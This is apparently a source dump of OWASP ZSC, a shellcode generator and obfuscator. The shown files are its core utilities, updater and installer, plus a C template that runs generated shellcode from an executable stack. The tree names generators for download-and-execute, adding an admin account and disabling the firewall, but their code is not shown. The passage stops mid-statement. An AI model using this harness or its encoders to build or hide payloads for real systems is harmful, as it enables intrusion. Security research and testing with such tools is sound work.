├── .github └── FUNDING.yml ├── .gitignore ├── CHANGELOG.md ├── LICENSE.md ├── core ├── __init__.py ├── alert.py ├── cli.py ├── color.py ├── commands.py ├── compatible.py ├── controller.py ├── encode.py ├── file_out.py ├── get_input.py ├── obfuscate.py ├── opcoder.py ├── run.py ├── stack.py ├── start.py └── update.py ├── doc ├── README.md ├── owasp-zsc.epub ├── owasp-zsc.mobi └── owasp-zsc.pdf ├── installer.py ├── lib ├── __init__.py ├── encoder │ ├── __init__.py │ ├── javascript │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── jsfuck.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_base64_rev.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── linux_x86 │ │ ├── __init__.py │ │ ├── add_random.py │ │ ├── add_yourvalue.py │ │ ├── dec.py │ │ ├── dec_timesyouwant.py │ │ ├── inc.py │ │ ├── inc_timesyouwant.py │ │ ├── mix_all.py │ │ ├── sub_random.py │ │ ├── sub_yourvalue.py │ │ ├── xor_random.py │ │ └── xor_yourvalue.py │ ├── osx_x86 │ │ ├── __init__.py │ │ ├── add_random.py │ │ ├── add_yourvalue.py │ │ ├── dec.py │ │ ├── dec_timesyouwant.py │ │ ├── inc.py │ │ ├── inc_timesyouwant.py │ │ ├── sub_random.py │ │ ├── sub_yourvalue.py │ │ ├── xor_random.py │ │ └── xor_yourvalue.py │ ├── perl │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── simple_ascii.py │ │ ├── simple_base64_rev.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── php │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── base64_rev.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── python │ │ ├── __init__.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_base64_rev.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── ruby │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── base64_rev.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ └── windows_x86 │ │ ├── __init__.py │ │ ├── add_random.py │ │ ├── add_yourvalue.py │ │ ├── dec.py │ │ ├── dec_timesyouwant.py │ │ ├── inc.py │ │ ├── inc_timesyouwant.py │ │ 
├── sub_random.py │ │ ├── sub_yourvalue.py │ │ ├── xor_random.py │ │ └── xor_yourvalue.py ├── generator │ ├── __init__.py │ ├── linux_x86 │ │ ├── __init__.py │ │ ├── chmod.py │ │ ├── dir_create.py │ │ ├── download.py │ │ ├── download_execute.py │ │ ├── exec.py │ │ ├── file_create.py │ │ ├── script_executor.py │ │ ├── system.py │ │ └── write.py │ ├── osx_x86 │ │ ├── __init__.py │ │ ├── chmod.py │ │ ├── exec.py │ │ └── system.py │ ├── windows_x86 │ │ ├── __init__.py │ │ ├── add_admin.py │ │ ├── create_file.py │ │ ├── dir_create.py │ │ ├── disable_firewall.py │ │ ├── download_exec.py │ │ ├── download_tofile.py │ │ └── exec.py │ └── windows_x86_64 │ │ ├── __init__.py │ │ ├── exec-intel.py │ │ └── exec.py ├── opcoder │ ├── __init__.py │ ├── linux_x86.py │ ├── osx_x86.py │ ├── windows_x86.py │ └── windows_x86_64.py └── shell_storm_api │ ├── __init__.py │ └── grab.py ├── module ├── __init__.py ├── readline_osx │ ├── README.md │ ├── readline.py │ └── readline.so └── readline_windows │ ├── README.md │ ├── __init__.py │ ├── pyreadline │ ├── __init__.py │ ├── clipboard │ │ ├── __init__.py │ │ ├── ironpython_clipboard.py │ │ ├── no_clipboard.py │ │ └── win32_clipboard.py │ ├── configuration │ │ ├── pyreadlineconfig.ini │ │ └── startup.py │ ├── console │ │ ├── __init__.py │ │ ├── ansi.py │ │ ├── console.py │ │ ├── console_attributes.py │ │ ├── consolebase.py │ │ ├── event.py │ │ └── ironpython_console.py │ ├── error.py │ ├── get_doc.py │ ├── keysyms │ │ ├── __init__.py │ │ ├── common.py │ │ ├── ironpython_keysyms.py │ │ ├── keysyms.py │ │ └── winconstants.py │ ├── lineeditor │ │ ├── __init__.py │ │ ├── history.py │ │ ├── lineobj.py │ │ └── wordmatcher.py │ ├── logger.py │ ├── logserver.py │ ├── modes │ │ ├── __init__.py │ │ ├── basemode.py │ │ ├── emacs.py │ │ ├── notemacs.py │ │ └── vi.py │ ├── py3k_compat.py │ ├── release.py │ ├── rlmain.py │ ├── test │ │ ├── __init__.py │ │ ├── common.py │ │ ├── test_emacs.py │ │ ├── test_history.py │ │ ├── test_lineeditor.py │ │ └── 
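test_vi.py │ └── unicode_helper.py │ └── readline.py ├── readme.md ├── uninstaller.py ├── version └── zsc.py

/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: [zdresearch]

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Compiled python files

*.pyc

#gdb history
.gdb_history

#pyCharm settings
.idea/*

#peda
peda-session*

#tmp files
*.py~
--------------------------------------------------------------------------------
/core/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''

pass

--------------------------------------------------------------------------------
/core/alert.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import sys
from core import color


def _emit(marker_color, marker, text_color, content):
    """Write one tagged, coloured message to stdout.

    Trailing newlines of *content* are written after the colour reset, so the
    reset sequence stays on the message line. A message without a trailing
    newline is terminated with exactly one.
    """
    text = content.rstrip("\n")
    trailing = len(content) - len(text)
    # The previous code sliced with content[:-num_newline]; for a message that
    # contains a newline but does not end with one that slice is [:-0], which
    # is empty, so the whole message was dropped. Slicing is avoided here.
    sys.stdout.write(color.color(marker_color) + marker +
                     color.color(text_color) + text +
                     color.color('reset') + "\n" * max(trailing, 1))


def info(content):
    """Print *content* to stdout as an informational '[+] ' message."""
    _emit('yellow', '[+] ', 'green', content)
    return


def write(content):
    """Write *content* to stdout unchanged (no prefix, colour or newline)."""
    sys.stdout.write(content)
    return


def warn(content):
    """Print *content* to stdout as a warning '[!] ' message."""
    _emit('red', '[!] ', 'yellow', content)
    return


def error(content):
    """Write *content* to stdout unchanged; currently identical to write()."""
    sys.stdout.write(content)
    return

--------------------------------------------------------------------------------
/core/color.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
#bug fix reported by John Babio in version 1.0.4 johndbabio/[at]/gmail/./com
from core import compatible
os_name = compatible.os_name()

# ANSI escape sequence for each colour name accepted by color().
_ANSI_CODES = {
    'reset': '\033[0m',
    'grey': '\033[1;30m',
    'red': '\033[1;31m',
    'green': '\033[1;32m',
    'yellow': '\033[1;33m',
    'blue': '\033[1;34m',
    'purple': '\033[1;35m',
    'cyan': '\033[1;36m',
    'white': '\033[1;37m',
}


def color(color):
    """Return the ANSI escape sequence for the colour name *color*.

    On platforms other than linux/darwin an empty string is returned, so
    callers can concatenate the result unconditionally. An unknown colour
    name also yields an empty string; the previous if-chain fell through and
    returned None for it, which broke the callers' string concatenation.
    """
    if 'linux' in os_name or os_name == 'darwin':
        return _ANSI_CODES.get(color, '')
    return ''
    # The string below is an unexecuted sketch of Windows console colouring
    # kept from the original source; it is never evaluated.
    ''' Add in next versions!
    import ctypes
    std_out_handle = ctypes.windll.kernel32.GetStdHandle(-11)
    handle=std_out_handle
    if color == 'reset':
        pass
    if color == 'grey':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x07)
    if color == 'red':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 12)
    if color == 'green':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 10)
    if color == 'yellow':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x06)
    if color == 'blue':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x09)
    if color == 'purple':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 13)
    if color == 'cyan':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 11)
    if color == 'white':
        ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x07)

    '''

--------------------------------------------------------------------------------
/core/compatible.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import sys
import os


def version():
    """Return the major version of the running interpreter as an int."""
    return int(sys.version_info.major)


def check():
    """Clear the terminal and exit on an unsupported platform or Python.

    Exits through sys.exit() with a message when sys.platform is not one of
    linux/darwin/win32/win64 or when the interpreter is neither Python 2
    nor Python 3.
    """
    if 'linux' in sys.platform or 'darwin' in sys.platform:
        os.system('clear')
    elif sys.platform in ('win32', 'win64'):
        os.system('cls')
    else:
        sys.exit(
            'Sorry, This version of software just could be run on linux/osx/windows.')
    # Compare by value: "is" on integers tests object identity and raises a
    # SyntaxWarning on current interpreters.
    if version() not in (2, 3):
        sys.exit('Your python version is not supported!')
    return


def os_name():
    """Return sys.platform unchanged."""
    return sys.platform
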
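--------------------------------------------------------------------------------
/core/controller.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core import run
from core.cli import _cli_start
import sys
import os

# commands.py is not imported; its source is read from the directory of this
# module and executed in this module's namespace, which is where the name
# `commands` used below comes from. Whoever can write to that file controls
# what runs here, so the install directory should not be writable by
# unprivileged users.
_COMMANDS_PATH = str(os.path.dirname(os.path.abspath(__file__)).replace(
    '\\', '/')) + '/commands.py'
with open(_COMMANDS_PATH, "rb") as _commands_file:  # close the handle promptly
    exec (compile(_commands_file.read(), _COMMANDS_PATH, 'exec'))


def _interface():
    """Start the interactive engine, or the CLI when arguments were given."""
    if len(sys.argv) == 1:
        run.engine(commands)  #run engine with user friendly interface
    else:
        _cli_start(commands)  #run engine with basic interface

--------------------------------------------------------------------------------
/core/file_out.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core.alert import *


def file_output(target, func, data, os, encode, shellcode, shellcode_op):
    """Write a C source file to *target* from the template below.

    *func*, *os* and *encode* fill the header comment, *data* supplies the
    argument list shown in the title ('' is rendered as 'True'), *shellcode*
    is placed in the comment as the assembly listing and *shellcode_op* in
    the C string. The length shown is len(shellcode_op) divided by 4.
    """
    if data == '':
        args = "'True'"
    else:
        args = ",".join("'" + value + "'" for value in data if value != '')
    # NOTE(review): both '#include' lines carry no header name on this page -
    # presumably stripped as markup during extraction; confirm against the
    # repository before relying on the template text.
    # NOTE(review): *shellcode* is interpolated inside a C comment; a value
    # containing '*/' would end that comment early in the generated file.
    rendered = '''#include
#include
/*
This shellcode generated by OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc[at]googlegroups[dot]com

Title: %s(%s)
OS: %s
Encode: %s
Length: %s
Assembly code:\n
%s



compile example(osx_x86): gcc -m32 -o shellcode_compiled %s
compile example(linux_x86): gcc -m32 -z execstack -o shellcode_compiled %s
compile example(windows_x86): gcc -o shellcode_compiled.exe %s
followed by(to run): ./shellcode_compiled or shellcode_compiled.exe
*/
\n\n
char *shellcode = "%s";
int main(void)
{
(*(void(*)()) shellcode)();
return 0;
}
''' % (func, args, os, encode,
       # floor division keeps the length an integer on Python 3 as well
       str(len(shellcode_op) // 4), shellcode, target, target, target,
       shellcode_op)
    with open(target, 'w') as fileout:
        fileout.write(rendered)
    info('File saved as %s .\n' % target)


def downloaded_file_output(target, data):
    """Write *data* to the file *target* and report the saved path."""
    with open(target, 'w') as fileout:
        fileout.write(data)
    info('File saved as %s . \n' % target)

--------------------------------------------------------------------------------
/core/get_input.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core.compatible import *
from core.alert import *
import binascii


def _input(name, type, _while):
    """Prompt for a value of kind *type* ('any', 'hex' or 'int').

    With *_while* True the prompt repeats until the value passes the check
    for its kind; with *_while* False a single attempt is made and the text
    is returned even when the check fails (only a warning is printed). Any
    other *_while* value returns None without prompting.

    NOTE(review): on Python 3 the 'hex' check only encodes the text as
    latin-1 and hex-encodes it, which succeeds for non-hex input too; only
    the Python 2 branch (binascii.a2b_hex) rejects non-hex characters.
    Callers should not treat a 'hex' result as validated on Python 3.
    NOTE(review): the bare `except:` clauses also catch EOFError and
    KeyboardInterrupt, so in loop mode a closed stdin makes the prompt
    repeat without end. Left unchanged because callers are not visible here.
    """
    data = None
    if _while is True:
        if type == 'any':
            while _while:
                try:
                    if version() == 3:
                        data = input('%s%s>%s ' % (color.color('blue'), name,
                                                   color.color('yellow')))
                    if version() == 2:
                        data = raw_input('%s%s>%s ' % (
                            color.color('blue'), name, color.color('yellow')))
                    if data == '':
                        warn('input can\'t be empty! ')
                        # undefined name: raises NameError on purpose to
                        # reach the except branch and repeat the prompt
                        _lets_error
                    break
                except:
                    write('wrong input!\n')
                    pass
        if type == 'hex':
            while _while:
                try:
                    if version() == 3:
                        data = input('%s%s>%s ' % (color.color('blue'), name,
                                                   color.color('yellow')))
                        binascii.b2a_hex(data[::-1].encode('latin-1')).decode(
                            'latin-1')
                    if version() == 2:
                        data = raw_input('%s%s>%s ' % (
                            color.color('blue'), name, color.color('yellow')))
                        binascii.a2b_hex(data)
                    if data == '':
                        warn('input can\'t be empty! ')
                        _lets_error
                    break
                except:
                    warn('you must enter a hex value\n')
                    pass
        if type == 'int':
            while _while:
                try:
                    if version() == 3:
                        data = input('%s%s>%s ' % (color.color('blue'), name,
                                                   color.color('yellow')))
                    if version() == 2:
                        data = raw_input('%s%s>%s ' % (
                            color.color('blue'), name, color.color('yellow')))
                    int(data)  #if empty, jump to exception and error!
                    break
                except:
                    warn('you must enter a int value\n')
                    pass
    elif _while is False:
        if type == 'any':
            try:
                if version() == 3:
                    data = input('%s%s>%s ' % (color.color('blue'), name,
                                               color.color('yellow')))
                if version() == 2:
                    data = raw_input('%s%s>%s ' % (color.color('blue'), name,
                                                   color.color('yellow')))
            except:
                write('wrong input!\n')
                pass
        if type == 'hex':
            try:
                if version() == 3:
                    data = input('%s%s>%s ' % (color.color('blue'), name,
                                               color.color('yellow')))
                    binascii.b2a_hex(data[::-1].encode('latin-1')).decode(
                        'latin-1')
                if version() == 2:
                    data = raw_input('%s%s>%s ' % (color.color('blue'), name,
                                                   color.color('yellow')))
                    binascii.a2b_hex(data)
            except:
                warn('you must enter a hex value\n')
                pass
        if type == 'int':
            try:
                if version() == 3:
                    data = input('%s%s>%s ' % (color.color('blue'), name,
                                               color.color('yellow')))
                    int(data)
                if version() == 2:
                    data = raw_input('%s%s>%s ' % (color.color('blue'), name,
                                                   color.color('yellow')))
                    int(data)
            except:
                warn('you must enter a int value\n')
                pass
    return data

--------------------------------------------------------------------------------
/core/obfuscate.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core.alert import *
from core.compatible import version


def obf_code(lang, encode, filename, content,cli):
    """Encode *content* with lib.encoder.<lang>.<encode> and write it to *filename*.

    On Python 3 *content* is decoded from UTF-8 before the encoder runs and
    the result is encoded back to UTF-8 before writing.

    NOTE(review): *lang* and *encode* are interpolated into a module path
    for __import__; presumably callers pass only names from the encoder
    list - confirm, and reject anything else before it reaches this point.
    """
    if version() == 3:
        content = content.decode('utf-8')
    start = getattr(
        __import__('lib.encoder.%s.%s' % (lang, encode),
                   fromlist=['start']),
        'start')  #import encoding module
    content = start(content,cli)  #encoded content as returned value
    if version() == 3:
        content = bytes(content, 'utf-8')
    with open(filename, 'wb') as f:  #writing content
        f.write(content)
    info('file "%s" encoded successfully!\n' % filename)
    return

--------------------------------------------------------------------------------
/core/opcoder.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''


def op(shellcode, os):
    """Pass *shellcode* to the convert() of the opcoder module for *os*.

    For an *os* value without a matching branch the input is returned
    unchanged.
    """
    if os == 'linux_x86':  #for linux_x86 os
        from lib.opcoder.linux_x86 import convert
        return convert(shellcode)
    if os == 'windows_x86':  #for windows os
        from lib.opcoder.windows_x86 import convert
        return convert(shellcode)
    if os == 'osx_x86':  # for osx_x86 os
        from lib.opcoder.osx_x86 import convert
        return convert(shellcode)
    if os == 'windows_x86_64':
        # NOTE(review): convert is imported but never called, so this branch
        # falls through and returns the input unconverted - confirm whether
        # `return convert(shellcode)` was intended.
        from lib.opcoder.windows_x86_64 import convert
    #add os opcoder here
    return shellcode

--------------------------------------------------------------------------------
/core/start.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import sys
#from core import update as upd
from core.compatible import version
__version__ = '1.1.0'
__key__ = 'ST'
__release_date__ = '2016 July 22'
from core import color


def _write(content):
    """Write *content* to stdout unchanged.

    about() and _version() called a name `write` that this module never
    imports, which raises NameError; this helper does what core.alert.write
    does without adding an import.
    """
    sys.stdout.write(content)


def logo():
    """Print the project banner."""
    # NOTE(review): the spacing inside the banner appears collapsed on this
    # page; the text is reproduced as shown.
    print(color.color('red') + '''
______ __ _____ _____ ______ _____ _____
/ __ \ \ / /\ / ____| __ \ |___ // ____|/ ____|
| | | \ \ /\ / / \ | (___ | |__) | / /| (___ | |
| | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| |
| |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____
\____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____|


''' + color.color('cyan') + '\t\t' + color.color(
        'green') + 'OWASP' + color.color('cyan') +
          ' ZeroDay Cyber Research Shellcoder\n' + color.color('reset'))


def sig():
    """Print the boxed project-URL signature line."""
    print('''%s
|----------------------------------------------------------------------------|
|%sVisit%s https://www.%sowasp%s.org/index.php/OWASP_ZSC_Tool_Project ---------------|
|----------------------------------------------------------------------------|%s'''
          % (color.color('blue'), color.color('red'), color.color('blue'),
             color.color('red'), color.color('blue'), color.color('reset')))


def inputcheck():
    """Report wrong input, print the signature and exit."""
    print(color.color('yellow') + '''
[+] Wrong input, Check Help Menu ,Execute: zsc ''' + color.color('red') + '-h'
          + '\n' + color.color('reset'))
    # sig() returns None, so the process exits with status 0 here.
    sys.exit(sig())


def about():
    """Print the project links followed by the signature."""
    _write('\n')
    info = [
        ['Code', 'https://github.com/Ali-Razmjoo/OWASP-ZSC'], [
            'Contributors',
            'https://github.com/Ali-Razmjoo/OWASP-ZSC/graphs/contributors'
        ], ['API', 'http://api.z3r0d4y.com/'],
        ['Home', 'http://zsc.z3r0d4y.com/'],
        ['Mailing List',
         'https://groups.google.com/d/forum/owasp-zsc'],
        ['Contact US Now', 'owasp-zsc[at]googlegroups[dot]com']
    ]
    for section in info:
        _write('%s%s%s: %s%s%s\n' %
               (color.color('red'), section[0], color.color('reset'),
                color.color('yellow'), section[1], color.color('reset')))
    sig()


def _version():
    """Print version, key and release date followed by the signature."""
    _write('\n')
    _write('%sOWASP ZSC Version: %s%s\n' %
           (color.color('cyan'), color.color('red'), __version__))
    _write('%sKey: %s%s\n' % (color.color('cyan'), color.color('red'), __key__))
    _write('%sRelease Date: %s%s\n' %
           (color.color('cyan'), color.color('red'), __release_date__))
    sig()

--------------------------------------------------------------------------------
/core/update.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core.compatible import *
from core.alert import *
from core import color
if version() == 2:
    from urllib import urlopen
if version() == 3:
    from urllib.request import urlopen

# Characters accepted in the version string returned by the update server.
_VERSION_CHARS = ('abcdefghijklmnopqrstuvwxyz'
                  'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
                  '0123456789._-')


def _is_plain_version(text):
    """Return True when *text* is non-empty and uses only _VERSION_CHARS."""
    return bool(text) and all(ch in _VERSION_CHARS for ch in text)


def _update(__version__):
    """Fetch the latest version number and download its archive if newer.

    The archive is saved in the current working directory under the name
    zcr_shellcoder_<version>.zip. Network failures are reported as
    'Connection Error!' and the function returns None in every case.

    NOTE(review): the archive is stored exactly as received; nothing here
    checks a checksum or signature, so its integrity has to be verified
    out-of-band before it is unpacked or run.
    """
    url = 'https://raw.githubusercontent.com/zdresearch/ZCR-Shellcoder-Archive/master/last_version'
    up_url = 'https://raw.githubusercontent.com/zdresearch/ZCR-Shellcoder-Archive/master/'
    try:
        last_version = urlopen(url).read()
        last_version = last_version.rsplit()[0]
    except Exception:
        write('%sConnection Error!%s\n\n' %
              (color.color('red'), color.color('reset')))
        return
    # On Python 3 read() returns bytes; str() of bytes is "b'...'", which
    # never equals the local version and would end up in the file name.
    if not isinstance(last_version, str):
        last_version = last_version.decode('utf-8', 'replace')
    # The value comes from the network and is used in both the download URL
    # and the local file name, so only a conservative character set passes.
    if not _is_plain_version(last_version):
        warn('unexpected version string received from the update server\n')
        return
    if str(last_version) == str(__version__):
        write('%syou are using the last version of software : %s%s%s\n' %
              (color.color('green'), color.color('red'), last_version,
               color.color('reset')))
        return
    write(
        '%syour software version: %s%s%s\nlast version released: %s%s%s\n\nDownloading %szcr_shellcoder_%s%s%s.zip%s\n\n\n'
        % (color.color('green'), color.color('cyan'), str(__version__),
           color.color('green'), color.color('red'), str(last_version),
           color.color('green'), color.color('yellow'),
           color.color('red'), str(last_version),
           color.color('yellow'), color.color('reset')))
    up_url = up_url + 'zcr_shellcoder_%s.zip' % (last_version)
    try:
        file_name = up_url.split('/')[-1]
        u = urlopen(up_url)
        meta = u.info()
        # getheaders() exists only on the Python 2 message object.
        if hasattr(meta, 'getheaders'):
            length = meta.getheaders("Content-Length")[0]
        else:
            length = meta.get("Content-Length")
        file_size = int(length)
        with open(file_name, 'wb') as f:
            write("%sDownloading: %s%s%s Bytes: %s%s%s\n" %
                  (color.color('white'), color.color('yellow'), file_name,
                   color.color('white'), color.color('red'), file_size,
                   color.color('blue')))
            file_size_dl = 0
            block_sz = 8192  # was 10 bytes per read
            while True:
                buffer = u.read(block_sz)
                if not buffer:
                    break
                file_size_dl += len(buffer)
                f.write(buffer)
                status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl *
                                              100. / file_size)
                status = status + chr(8) * (len(status) + 1)
                print(status, )
        write('%sFile Downloaded: %s%s%s\n\n' %
              (color.color('cyan'), color.color('yellow'), file_name,
               color.color('reset')))
    except Exception:
        write('%sConnection Error!%s\n\n' %
              (color.color('red'), color.color('reset')))

--------------------------------------------------------------------------------
/doc/README.md:
--------------------------------------------------------------------------------
# OWASP ZSC Documentation
The Latest version of these documents are available **[HERE](https://www.gitbook.com/book/ali-razmjoo/owasp-zsc/details)**.

* [Read Online](https://ali-razmjoo.gitbooks.io/owasp-zsc/content/)
* [PDF Version](https://www.gitbook.com/download/pdf/book/ali-razmjoo/owasp-zsc)
* [ePub Version](https://www.gitbook.com/download/epub/book/ali-razmjoo/owasp-zsc)
* [Mobi Version](https://www.gitbook.com/download/mobi/book/ali-razmjoo/owasp-zsc)

There are some extra tricks on the blog which is located [HERE](http://zsc.z3r0d4y.com/blog/archives).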
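--------------------------------------------------------------------------------
/doc/owasp-zsc.epub:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/doc/owasp-zsc.epub
--------------------------------------------------------------------------------
/doc/owasp-zsc.mobi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/doc/owasp-zsc.mobi
--------------------------------------------------------------------------------
/doc/owasp-zsc.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/doc/owasp-zsc.pdf
--------------------------------------------------------------------------------
/installer.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import os
import sys
from core import start
from core import color


#start.logo()
def check_prv():
    """Exit unless the process runs as root (POSIX) or as admin (Windows)."""
    try:
        # compare by value; "is not 0" tested object identity
        if os.geteuid() != 0:
            sys.exit(color.color('red') +
                     'Sorry, you most run this file as root.' + color.color(
                         'reset'))
    except AttributeError:
        # os.geteuid does not exist on Windows
        import ctypes
        if ctypes.windll.shell32.IsUserAnAdmin() != 1:
            sys.exit(color.color('red') +
                     'Sorry, you most run this file as admin.' + color.color(
                         'reset'))


def _enter_source_dir():
    """Make the directory that holds this installer the working directory.

    The copy commands below use '*' and '.', i.e. the current directory.
    Without this step, starting the installer from another directory would
    copy that directory's contents into the install location, with root
    rights on linux/osx.
    """
    os.chdir(os.path.dirname(os.path.abspath(__file__)))


def _install_unix(share_dir, launcher_path):
    """Write the launcher script and copy the sources into *share_dir*.

    Requires root (see check_prv). The launcher starts whichever `python`
    is first on PATH. An existing *share_dir* is removed before the copy.
    """
    check_prv()
    _enter_source_dir()
    executor = '''#!/bin/bash\npython %s/zsc.py "$@"''' % share_dir
    print(color.color('cyan') + 'Building Commandline')
    with open(launcher_path, 'w') as commandline:
        commandline.write(executor)
    print(color.color('green') + 'Copying Files' + color.color('white'))
    status = os.system(
        'rm -rf %s && mkdir %s && cp -r * %s/ && chmod +x %s/zsc.py && chmod +x %s'
        % (share_dir, share_dir, share_dir, share_dir, launcher_path))
    # The exit status used to be ignored, so a failed copy still printed the
    # "you can remove this folder" message below.
    if status != 0:
        sys.exit(color.color('red') +
                 'Copying files failed, installation aborted.' + color.color(
                     'reset'))
    print(
        color.color('yellow') +
        '\nNow you can remove this folder\nfiles copied in %s.\nto run zcr shellcoder please use "zsc" command line\n'
        % share_dir + color.color('reset'))


def linux():
    """Install into /usr/share/owasp_zsc with the launcher /usr/bin/zsc."""
    _install_unix('/usr/share/owasp_zsc', '/usr/bin/zsc')


def osx():
    """Install into /usr/local/share/owasp_zsc with the launcher /usr/local/bin/zsc."""
    _install_unix('/usr/local/share/owasp_zsc', '/usr/local/bin/zsc')


def windows():
    """Copy the sources under <sys.prefix>\\Scripts\\zsc and write zsc.bat."""
    #check_prv()
    _enter_source_dir()
    installing_path = str(sys.prefix) + str('\\Scripts\\zsc')
    try:
        os.mkdir(installing_path)
    except OSError:
        # best effort: the directory may already exist
        pass
    print(color.color('green') + 'Copying Files' + color.color('white'))
    # The path is quoted in both places below because sys.prefix may contain
    # spaces, which would split it into several arguments.
    tmp_copy = os.popen('xcopy /y /s /i . "%s"' % installing_path).read()
    print(color.color('cyan') + 'Building Commandline')
    with open('%s\\..\\zsc.bat' % installing_path, 'w') as tmp_add_command_line:
        tmp_add_command_line.write('@echo off\npython "%s\\zsc.py" %%*' %
                                   installing_path)
    print(
        color.color('yellow') +
        '\nNow you can remove this folder\nfiles copied in %s.\nto run zcr shellcoder please use "zsc" command line\nNOTE: IF COMMAND LINE "zsc" NOT FOUND, PLEASE RE-OPEN YOUR CMD!\n'
        % installing_path + color.color('reset'))


if 'linux' in sys.platform:
    os.system('clear')
    linux()
elif 'darwin' in sys.platform:
    os.system('clear')
    osx()
elif 'win32' in sys.platform or 'win64' in sys.platform:
    os.system('cls')
    windows()
else:
    sys.exit(
        color.color('red') +
        'OWASP ZSC currently supports install on windows/linux/osx only, for other platforms please copy source files to a directory and run'
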